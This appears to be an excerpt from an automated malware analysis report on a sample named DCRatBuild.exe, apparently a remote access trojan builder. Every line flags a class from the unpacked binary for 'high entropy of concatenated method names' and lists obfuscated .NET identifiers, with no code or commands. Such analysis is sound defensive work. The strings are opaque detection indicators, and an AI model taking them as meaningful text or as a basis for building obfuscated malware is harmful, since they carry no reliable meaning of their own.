            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, WmXDNc1UxSsI8Dln6QT.csHigh entropy of concatenated method names: 'pQJ13Ijgo2', 'kNRj4rxO0TUX8dYVWTU', 'aJFwllxBPFkIdvMV9F6', 'JJ4LaIxjfZPQbZmhk2U', 'xZ8p3Tx0GVWZaMmkabP', 'xxikaZxZrf00HFEAM9D', 'kENb2jxyHY86BprDemH', 'JU9CtqxPgnDnV07Plsc', 'yWFLtZxDS4fPQbUEsD0', 'f28'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, TDM4eGnvylMYY0i1iZl.csHigh entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'cK9R4uClV7', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, T8FCuuYe5ynxfEF8Wit.csHigh entropy of concatenated method names: 'Icmbxi1N5VAD1FA9FEX', 'cOPJtg1FF6AgyNnn0U0', 'eOSU7I1nD4k5F0Upwe7', 'z04hWk14PsEsauJ3Z5H', 'x8gJxBASGU', 'MqqprI1QtBWpqGrh5DW', 'pewtrh13NfJNfT82Ew2', 'cECWjO1hKOjXrWvd3yf', 'zdrBUs1CUIg3jDqxxNQ', 'wpb10h1b3T616tJ2R9j'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, ecCseonHGRAM7nMCQuY.csHigh entropy of concatenated method names: 'E5rAXNBINo', 'X7mAM7RjJe', 'bJtASk8fik', 'KDFAhXr5dS', 'yqiAEVL7U7', 'RxpZx4eTmVaKKkHOAwn', 'y1ho8ceNvrm6UumrUXV', 'g5WZZqeF9231lJ5jdMo', 'dDRPYVe7sqT2LKxciNL', 'nkl36teQDkaUOASc4qE'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, VbYre3ItnDaBentHBJ1.csHigh entropy of concatenated method names: 'MVqQeooD7o', 'MAXQxIUo6h', 'egVHYXMntKf2hAbhLbQ', 'b03CgZM4Oq8c57tJy5e', 'dBYWCZMgTvmGcwJcwEY', 'pmlJ1JM8B5d6T3srd01', 'TlAFoLMNnl9Z9OEGlNp', 'LF65UFMFQw4yl6VH9Hg', 'HPOae1MT7mBtxLFAOLA', 'kQ9yODM7NXyHvCjl5BS'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, vLWq6a1fkX3BiEZNZmC.csHigh entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'IU3f6o9QiNFDqtUChon', 'polnQO93B5NogEqr6qn', 'xOqQ2D9hdZycQXBVFiJ', 'iOKsDW9CliptaGPRfnn', 'WVuPHY9b5IhGLnPSqey', 'D63VP59vm7AuO3DoYY4'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, lKZw0slmlIFpBCgcl8.csHigh entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'qIyhlFIOgkVn665MPMF', 'hJ7duqIBxpF5j9kWvxu', 'AwsHGhIZXNhiZIgt5nX', 'XwPjaxIyLw8DbIBaRBa', 'tMZwSDIPNoHKHGAeLKb', 'tGvI8TIDhRLeMBG45kP'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, WMM0Lumd6uwhVVio1lC.csHigh entropy of concatenated method names: 'jHR', 'B92', 'TrdEqGpdkP50TLUIWYe', 'yYsnUKpzZmEB0VcH08a', 'DcbfuNRH0wLoaedCxok', 'IigBVORAiKnX7DX6om9'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, jkaYrcIGc3fBw3eT0tG.csHigh entropy of concatenated method names: 'xakn3aYrcc', 'N2Xw1U02jUL28sQEpQn', 'k6pStZ0dGMGk91heag9', 'BFuiyP0sFhWpjSFJEyo', 'AQZB900k0GGTnRa99RM', 'Jp8OKZ0z5XOETS8sW2k', 'pTDFtfOHckNCs8YhDlp', 'GFebjMOAF80qKf9vX2Z', 'ycBkTaOVvD0OShduTkO', 'bTXZwbOqBMlAHE18TCn'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, kgU2L01xSqwEVNQawjm.csHigh entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'M3Ku4CGuEOYkSoe2yqM', 'JvejMLGSZivfoffPYdI', 'rTGgdxGXhBRgjvCjakw', 'NvN2QTGoqgwxgiiqo3B', 'cibrYCGpsMyxl8ZaB60', 'ux7jq5GRZNMWm1yb7dj'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, OZEmyGmIOayneMgFHhS.csHigh entropy of concatenated method names: 'GPqO2UXOpe', 'dcPO6umq6M', '_8r1', 'DEGOsdMrBd', 'NK0OaSFR4o', 'fMIOu5fwM3', 'EjfOPJHv98', 'Bsx0gMSjuSrjB4VRZVI', 'ui78YUS0I4WY3oU0sZB', 'RFvWUgSOMybm9uuwWyY'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, PqLZKvmV9XAXm90IcWr.csHigh entropy of concatenated method names: 'WbNOteAVGr', 'm9LO5B6jFN', 'yA7OV1d9xt', 'iktOcyj7Rn', 'QaHO433t7K', 'CNHrl0SkpLja8rU3nxW', 'RqDFC7S2FR7AIap7v7H', 'yrgjM0SdRhPoTHV0Px6', 't3gM3HSzNhvrd87qwBF', 'GD4D2sXHRdsiw6Zxcrd'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, ktxd7lm7Ku4apr8eUvK.csHigh entropy of concatenated method names: 'ShUjgEiKmW', 'Mxw9CkpQFc9k42yXGhl', 'qvXDbCp33pwaitCR6es', 'gowVthpTqeJhAxYn5FC', 'WlKaBpp7JBwrV3qSS7q', '_1fi', 'Wg2kpTgQfm', '_676', 'IG9', 'mdP'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, e2u35lmjE2fSn6mMUxR.csHigh entropy of concatenated method names: 'XN8H6fBXqr', 'ggRHsBYPJX', 'eykHaU4vFA', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'WvtHu5Xc0R'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, jC5YDdYRWTYmuTqCgBB.csHigh entropy of concatenated method names: 'j1nJAyKLS7', 'X8aJRyygjN', 'ue4JO4RdUv', 'GtmJHEPFnv', 'a4VJk47tkC', 'y3tJj1pdIy', 'EiVJ3b69Zt', 's9OJrntv29', 'LcMJJUoAPp', 'OJRJTakh0v'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, mA6HgIIgOZBxSY3Ekw7.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'gkknGdEuJ1', 'bTMnBkeA6H', 'IIOn7ZBxSY', 'CEkngw7hoN', 'FB5nXncR73', 'BLXTOoOfASdHZ7rkgTG', 'RBTlRvO6C9vLhTRPcJJ', 'CEvL1vOG7G3MBLqve9G'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, r7i0W3fz2BIDP0XuyDI.csHigh entropy of concatenated method names: 'LtYsklEcPY', 'E2Asj99AIl', 'yUfs3mcfo2', 'DGolCpnX5jLHjNT7fbZ', 'cLd0b0noTXcS6D9EZZr', 'GatOtPnuOP9yABO06RG', 'R4OHcEnSJ6YHKiJ9oLi', 'be2SJ2npXXPIc5eXGgO', 'uXLxBfnRCcWeN4hYrcG', 'uHdHxLn1EAUUdrsE1Zx'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, aZnlhm1CAABsIa9RBQ2.csHigh entropy of concatenated method names: 'EJwIaXW42A', 'NnOIubpbjR', 'wYPVBrtc5Q2K2ug61DZ', 'MrwwJYt6VEeANJv8Doa', 'NTRlEOttkt09XfohFXG', 'hio4UptwbT7Gc8molDN', 'dSTQ6htYJqanOJr0fFb', 'SUKND6tJfHeVP6wtbqv', 'aJjc2FtML5N4pXdIgdb', 'BxV2j0tjfGy5WfgLO3K'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, srIwKrfPo6FATXUxSkB.csHigh entropy of concatenated method names: '_223', 'cgc9QePOZVnR3d1k26d', 'wy9vc2PBYxJGKBCdNMr', 'u0XPsTPZD91u1RFPKFB', 'V9TyHfPyHM47E5F2syu', 'xGEZEbPPiyyy2d68vib', 'htgJ2UPDHE5GWHdTtor', 'oedJQdPgZQKt7kccoBf', 'Vn4lN5P8wrMRLmmD2GP', 'DUPaFlPnhoUx24bMYYT'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, RZAd3wJJfGDG5KqnCW.csHigh entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'ffIMOJ06G', 'XnZ5jVVZT6qwrPnSldY', 'q5x4a4VyHsBna1VCQNk', 'QcOJuSVP9CZ46oNPWTx', 'gMn6qSVDpm0aqC5I77D', 'skSfnyVg6FBG6ypoiwQ'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, HjYabonTIyjxbiXVBGl.csHigh entropy of concatenated method names: 'AN8AoN5ZNp', 'wuuAFQiPZe', 'ST7AWnKxFn', 'iCFA95NnHP', 'k6oAvKW7xu', 'k7rA8XGf9K', 'FsMNM7eWujE7CiZ8rSY', 'zUTOBie1oN5xcZnYJgk', 'asty0GemIqvPtjht94G', 'FsDW5peKLLlFJZyTO9b'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, EvMIiDYaSphYYhce8T7.csHigh entropy of concatenated method names: 'f4Z1oiaaCm2bg', 'DZxoq51Mlx5r19Aie2K', 'UerLZx1jeCPGBGnkYEK', 'Kjqrha105wRa2HbXq7k', 'XGt4NV1OFh1eohgKDbE', 'Rct8jH1B5ffZEvmj7Mt', 'oGt2OY1YM7PMVTOQYoa', 'n1wGWW1JeCLFACjRGga', 'BhwDBE1ZGPL5el9vkdv', 'XqVWmk1ygfqnHjpjRGN'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, hcK7ZnpIt8oXNoR1tX.csHigh entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'N6Cxw1iMQLm8wDtdJEW', 'lQ102Oij0ejNjlKscLB', 'tnUYebi02LcFuJHiCYC', 'F2i0l7iOL5x1luqfGNG', 'd2jf38iBEElYqFrpy59', 'dDdUO9iZv0q3IN7yrSe'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, IM8Y0yfV22qvhg5kTZs.csHigh entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'WwIPFWgYHx4byVr2Oma', 'cJjvrxgJ9VJOLTMwtJn', 'mp40EqgMTS4mVHiMdsD', 'c47BekgjB9eVVthL9gT'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, JSvtCM9rFJub9IZUnS.csHigh entropy of concatenated method names: '_88Z', 'YZ8', 'ffV', 'G9C', 'xj4qtciRgPKcw4hnJep', 'zyAxmji1fnHQtm1jquq', 'jXOmivimdRycNEX978W', 'FLdNuZiWTaZcmscJmeG', 'HR5sswiK64Prw6YbN2X', 'EjxvFlilUsQw0nNaZKa'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, U4xZGS164cWf1h1WGxW.csHigh entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'hHpYBgGGFggemeCeWTq', 'Y0dt5lGxlh6GSwoijqs', 'unThmIGf9oiKixdnN3i', 'Hwl8myG64vx4XSf8aYP', 'QxTClRGtfkarlsDDLCS', 'uRukqhGcwhyJOAryZdq'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, EJRA9hmJvApynMht73d.csHigh entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'moHHRidBtv', 'gPYHOt46DU', 'dFZHHFU4SN', 'mq0HkN1Aeq', 'wBmHjp5STh', 'rAIH3p9yll', 'GA1luyoedkbPQcAPMS3'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, dbRMeXQ575SOntb20Eg.csHigh entropy of concatenated method names: 'qsIP09rA2j', 'V9pPGUU2an', 'Ak5PBRkm1U', 'qGBP7inca6', 'aCuPgQb2ek', 'H36LBVNvglFNMOmiTEw', 'PNsWeXNEFlD8lyyHqXR', 'A4ufZENCcHEjZgnguo7', 'hB8HUoNb78xF4dwKCmN', 'dn1dw6NeCLeV6TZCqBv'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, LmSC3EI6jv3Pr2T55hN.csHigh entropy of concatenated method names: 'bjNfTqblQk', 'GT4f024FK9', 'uQFfGjqxWi', 'ykKfBv1aHI', 'UUDf7AJCNO', 'B1Efg3RBNf', 'XHtfX5PcKN', 'TXyhbQYnRe9U2XoOrcR', 'MMaWn5YgspJ3kjWw9il', 'uyY8p0Y8FlPvHnhAFMm'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, pXRCpH19vFMMQuFLeUx.csHigh entropy of concatenated method names: 'M91IU9OQ5W', 'rYmJegc9pRmLH8HhWNp', 'lb2iWbcGQmL9eHTJV2X', 'tccFqlcIJuYtXM6bI7e', 'EGZVe7cifjCAecvF7pN', 'pXNsJScxM6s4q1suTUk', '_5q7', 'YZ8', '_6kf', 'G9C'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, nC1gEDfhZmYk9QTj1vI.csHigh entropy of concatenated method names: 'sg9', 'ofGMPvZqkC', 'RZa68BL7vs', 'SbeMDYFjfA', 'J0spPKgW43vSa9ig6qV', 'sC1aCrgK8Wwfufu3mXc', 'xuZXrHglL1vNP9kcb3E', 'mtSDhBg1Q4E9YWwEolj', 'mKcySygmwF3661WVBUI', 'TejAsKgUUYlHMgpS8W1'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, xOoR8N1HhDLW5mmEXKP.csHigh entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'NSX20hxd3wR8UjWme4T', 'to8d8ZxzCE4jwvSKx0x', 'RMxgEkfHM55sa2CYSJy', 'V26Le3fA5HJa6GFTWSP', 'dV5OcVfVfXilBNokZdj', 'tvbcpafqvVGJtPJrvrY'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, nYKMMv1GLcBgbNJplvJ.csHigh entropy of concatenated method names: 'AlR1Fr5oaU', 'Jb0sta6nvj947ZHOaYo', 'SWsdVv64GKEm1e9kdZL', 'fX49MM6g8RX9Acyl36J', 'qhlMJj68dAQiwCc5UTg', 'XjYp9M6NEBD1fQ7iFFm', 'QLw', 'YZ8', 'cC5', 'G9C'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, yQ5WGN1Y6EM87nG9LHI.csHigh entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'cNIEEM95nX3FJlLZugV', 'fDEpLR9sGOSSEvkrGTi', 'TMpRyW9kjpikJKkykem', 'sUtGVJ92yHYZIilquOP', 'of4hQm9dBqwbv9OAVyw', 'TmO2lk9zVqI7QGq9w2d'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, W4WPSscSdKwTg6HOgj.csHigh entropy of concatenated method names: 'CstAndi1w', 'BZkRDZ6XI', 'lbaOKSunj', 'OT5HGpnEc', 'fl5kKabUB', 'rGwjUFYoY', 'xNR35IwfR', 'XVdbc3Axr3mNnikaOv9', 'U2IflCAffMg5oors7pW', 'nUpjr2A6MFtjjGrSWWb'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, uWENbonr8jd1tIAS1xn.csHigh entropy of concatenated method names: 'CvxAdv7Hq1', 'gKHAiCXYkU', 'LR8AwfngFw', 'hHim39eSeYNMFeUU8kO', 'pdibRleLY5VcwkOgAvO', 'dM41eyeuXcHRkJbZ9PT', 'jKrYWPeXGjTp8cyVo7v', 'wYVT51eokogZFb3OGB9', 'lKixj8ep8UNxdeFCUcX', 'xHAN6teRE8rJRo71WQY'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, jE5WtPml1RdQjdFQ8DA.csHigh entropy of concatenated method names: 'PJ1', 'jo3', 'YVe36uBscA', 'FV13sNS1ip', 'nFr3aXIbYS', 'EC9', '_74a', '_8pl', '_27D', '_524'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, iROHQ3mmEIfL5S674q7.csHigh entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, yWutIw1jxXL5qX4CDYU.csHigh entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'FvbnJXfEI3kdZRkJAYQ', 'BcwGjNfeuWgHgxc0fk6', 'VhCPMYfL1Zrxnk5TLME', 'O7ZiQbfufBpeJpqsc0C', 'e9MkMdfSwgZSEF4dYWU', 'YDiYhQfXkG3oafd4wQF'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, H7npMFILkHSORxw2N45.csHigh entropy of concatenated method names: 'HxOfzW04Ao', 'SyyQZJuFAf', 'dL2Q1hYJGm', 'f9kQIoCKW6', 'vSQQffZLyX', 'yCpQQHvFMM', 'duFQnLeUx5', 'DU9QmJg36L', 'ARhQYCqrb9', 'f5uQ2U70Hc'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, rQuI3Fm0ST2JYPvCrjv.csHigh entropy of concatenated method names: 'JN41JVpIZESMcdZ3EbH', 'acIbnTpipqyx6Ul6tT2', 's2yX9NpVtplZ0rK2odG', 'Ut91mwpqeWMX102mIcu', 'ovmHGFPu5D', 'WM4', '_499', 'UEyHBlXkqw', 'ussH7OQju6', 'hNJHgR9lIm'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, CudyvdfljsVS7HSNSDB.csHigh entropy of concatenated method names: '_5u9', 'NSoMmYZ9Ja', 'VbqsZWovWm', 'fUJMxvrwqP', 'ncPZjKgkkJvPEK5KrYI', 'afKcfgg2AUN4qQ6gLvK', 'sAQg86gdVX2A1LWERcW', 'KGR2Lwg5U553O4eFoQP', 'eFhx9Sgs2mDwbCQ51V0', 'kewxoqgzySOfltPMIyW'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, GvNNiUIcgHqlnAdBYvR.csHigh entropy of concatenated method names: 'U04Q5L7XgJ', 'syuQVOSMHG', 'lWqQc9N5wI', 'oGSQ4WI0BB', 'rO3QAUI9Lg', 'WjXkAojH8Raa2BD7mnf', 'Is2h10jACVqouXJaUaF', 'Wy7kryMdBFyhkiMwOau', 'CZ2SapMzPfwC3p5W79F', 'yJgQwXjVxmdQSPgD1j3'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, kkt7FX1bTdGrWt8uukE.csHigh entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'NgLQk7GajK8kdI9lH18', 'D279kvGrKsfpYwPjpak', 'FliTSiG5YipVfe3It5l', 'FSlt61GsWUiLgao1Lyw', 'AauqyaGkFij4T1Vo2eh', 'pNGao2G27dYZFhj469v'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, CrJ9sxQwgB4PfARRM97.csHigh entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 've8xKT7Mju', 'LhPxbdQMXx', 'r8j', 'LS1', '_55S'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, xBCaIw1PrVcGNtTJjiy.csHigh entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'zeH0aFGFKpdb6mT6tMs', 'lXRwuWGToHlYR51hFWB', 'DhorAQG7LLgJxHrDNQO', 'YxfuPyGQaLoduGhnQim', 'ey5eGmG3VrbKfc0bqyH', 'sNbodMGhMM9phQAgC81'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, ePmEV1Qai31JfgSSjPc.csHigh entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, Bb5GXlIDVThxamtP6hu.csHigh entropy of concatenated method names: 'jy1YRgCnfq', 'Y7VN6qBlCwp9jmMo0yr', 'yJC97qBWmpDpofvubDu', 'zNJi6yBKiTtxS2SqbIH', 'OleQGOBUM53ggSKKG3b', 'fvOddNBavF5G5p2gcZW', 'm6bYL5OZ5R', 'fuFYU5Vstn', 'gyEYtaNykF', 'C0rY5IPfS5'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, RKPtI7gYJ7pJMkgXQi.csHigh entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'c6ZMD4qEdyIpOKiRCHi', 'G4gUamqe21KUB7qcELI', 'IXnwfBqLUmpksZhUhjR', 'SD4Q1LquGZ2XcoYvDe2', 'KKdKiJqSRah6ru3gcIu', 'UDhfVhqXdPIfqM9RIKw'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, xDsoNACsu1IqjwB9wn.csHigh entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'ly2hSfIpWEjdGu0bNZv', 'DCiWqoIRgykAD3lTeyk', 'ObvCWvI1K64NBN7SrSb', 'DVaksvImNSaOQk2wg30', 'zLRoWvIWE8eWwFUTG40', 'dG7N5RIKohoHoL8yuTB'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, CnaXDB14wxBIrIZiguf.csHigh entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'DVyBqDxvihxy7xGlKIN', 'XtiO4MxEsmvF8jdB6he', 'vWjpOLxelhS0O3B85OV', 'cWgr4CxLTBilk3QviNl', 'wGpPhKxuQAI31Wuwkj5', 'RS45aDxSf4t9iv8FRxC'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, hankk5m4Rkm1UNGBinc.csHigh entropy of concatenated method names: 'IGD', 'CV5', 'JjnOAF5GHQ', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, DdoalDfiXXD3LHp9Zhr.csHigh entropy of concatenated method names: '_9YY', '_57I', 'w51', 'hQjMYHDlI8', '_168', 'JDyIOS84pZRU5Hn2fv2', 'vEoAMY8NnesYA6Nknm8', 'dfkXY98FasmyqPu2cyn', 'gfCx0Y8TUIarYgoooH3', 'j6b5OG87uD9NfW8ccOQ'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, hSwbFVnDmHlHbvG6PrZ.csHigh entropy of concatenated method names: 'Be2Rkaxb63', 'WOMRjbOgnZ', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'dbGR3gCCfS', '_5f9', 'A6Y'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, uWuIqeQAZNYWthMp4Xd.csHigh entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'rQueZI3FST', '_3il', 'hJYe1PvCrj', 'WA6eIaE0u3', '_78N', 'z3K'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, Im7ZDNQn5VoMVrI6R5M.csHigh entropy of concatenated method names: 'r4MuyBDm66', 'yOx3Zx4B8ZONk3bKouc', 'TLsCUO4ZVXCsERrsXgP', 'H44vvV40REBJiKxrgVD', 'CE69ax4OQXGq4ZH44UE', 'NYGsrekW7b', 'q95sJ2kqka', 'iCVsTHZUIG', 'l4Ms0AuSGp', 'T3MsGhLVvI'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, CYToTgQyhRFm7TNLLpg.csHigh entropy of concatenated method names: 'VYtPQ6Nnwm', 'VuIPnqMaVj', 'WguPmoIVYv', 'lm94rXN04Wgi9cmw62k', 'WnTlW9NOOORES4PsqZw', 'PrHJ3pNMOmlS3h8j3Aq', 'cMjII4NjCaOrQqvyP3x', 'bUltg6NBfCylMsYdQi4', 'FreoRvNZVZA1dqmWUw9', 'pm9MUuNyNhuArkrgCBd'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, nuDRoJnot1hl1avl76U.csHigh entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, XnpTgxmRiFAVyjFFh2q.csHigh entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, VhMPml118mpaPsrmrrj.csHigh entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'JsFHKK9ZIWOBYm5ctw1', 'l0HmIB9ympCEBpIfDHa', 'D1h8qC9PeGdbnoFIkZT', 'nISSkH9D1VOciGUpIbS', 'MFIH3Y9gpIhVVoDuYKh', 'dGX0h498qwOITVsEGZH'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, SA4pyvmHmu95oRQLWuO.csHigh entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, cKxDIp1DR30LvuIFl08.csHigh entropy of concatenated method names: 'BHqIcD56F4', 'nZGI4S4cWf', 'bh1IAWGxW4', 'ut8RuyctD6AVwttrL89', 'SvxSGFcfoSsbWlc6RJp', 'poHgWTc6AgndVNKpY9K', 'ABqB5PccyXsq3MEXrjc', 'AXNidScw24alUX7RUYX', 'vrqyKscYHTWOsfiIRQU', 'bcXuDRcJ1cIm3fqfYm5'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, DDiUNFMO93Kf5vcXdy.csHigh entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'cbXKbyqsconiveeGDJL', 'wruNafqky1AIk19MTAK', 'tJoVwvq2Z7fOroG1O93', 'AU5uq4qdWWau2u5ugG9', 't2sb8sqzXpVgltbvmVo', 'P70yqfIHuGiHZQgedIt'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, DyanhGfst51QiCfKYHj.csHigh entropy of concatenated method names: 'DQE20dbBxM', 'fjQ2GXwCRI', 'pm12Bf3KVf', 'Y9UTVmPJmLONSuswP4p', 'MIOxQuPwNmrf8iJ4Nto', 'dZiXrHPYlZGKh3oYMHL', 'CbQ4nRPMQ65y4hQZFe8', 'zRu2KdwlI9', 'lqv2bqlCV2', 'AhJ2y3bHGS'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, SigsX8Q91chQ8FtG4Ji.csHigh entropy of concatenated method names: 'xA5KRGNhLy', 'edCKHBS6M3', 'hGtKea94C4', 'WtEKxl37kx', 'cFFKKr1530', 'iG2KbVjTYB', 'MfqKyxehQS', 'W8PKNSIpos', 'wPoKLPOL0W', 'C0IKUKWRY3'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, blBAitfAgFSYhWNYmHM.csHigh entropy of concatenated method names: 'F7p6TF7qxj', 'SiJ60jO67l', 'VQIaZrgBmyf3eRuoI1k', 'pMLI41gZlfD5s0VIZDR', 'IP8Wuvg0GnAbCu3a7u9', 'TmdNv2gOfywmkuyotBa', 'VhTmZOgypf65B27d48A', 'oe3ODJgP7XBVGf2kJ33'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, lXmetBmZ2od6uQ9gUad.csHigh entropy of concatenated method names: 'yHxRq0GjmW', 'p1KRCIwfiv', 'SMPRdcykyq', 'E5nRiYrwGQ', 'HLVRwZw02j', 'hw8Rpdi1cg', '_838', 'vVb', 'g24', '_9oL'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, CL54OdIjQEdrBnVnMYU.csHigh entropy of concatenated method names: 'saOQ85b3vn', 'PMIQDBMSn1', 'F9bQzYre3n', 'YaBnZentHB', 'D1pn12gGsD', 'k9XnIDrHqW', 'gubnfoyO4K', 'HlhnQYd45s', 'NRXnneGvNN', 'NqGVamj5KWe36qHogRj'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, HRH21JQ6vUHB00EaoFM.csHigh entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, ig8uZN1RMFOwLpVfVAB.csHigh entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'qMY02RxmJ8OL04MFIrO', 'IJwSBoxWOXIaG3DYt1g', 'tLqKPyxKiEDfJVDSg2q', 'RKQ9gsxlXyMg5EKZhqv', 'BhGnXdxUNVh4R6Y09AH', 'fRZgaYxaQM25BJYegvx'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, EXZU6Gf9nBtdEdOZAkc.csHigh entropy of concatenated method names: 'DC1TKSnewQCAFAEka0F', 'Q9F2w0nLFNwOraRsX38', 'lm7twAnvwHmBAiLroaq', 'dutuT5nEvjJPvEO6XMX', 'IWF', 'j72', 'yM9sy7xlDZ', 'UCqsNFTufh', 'j4z', 'yP3sLTC0WU'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, pOpLyPfFxqHRudwlI9P.csHigh entropy of concatenated method names: '_269', '_5E7', 'egmMpWE2nF', 'Mz8', 'QctMtV4Sh4', 'ms0nq48UEM3Zn2oyFZt', 'RHDUpI8aEeNWkfBEYej', 'hgx2jJ8rnk0PuTG9ihO', 'adrYji85ALRuPiXe0YW', 'mX2y1f8sXQvPsMUQeBL'
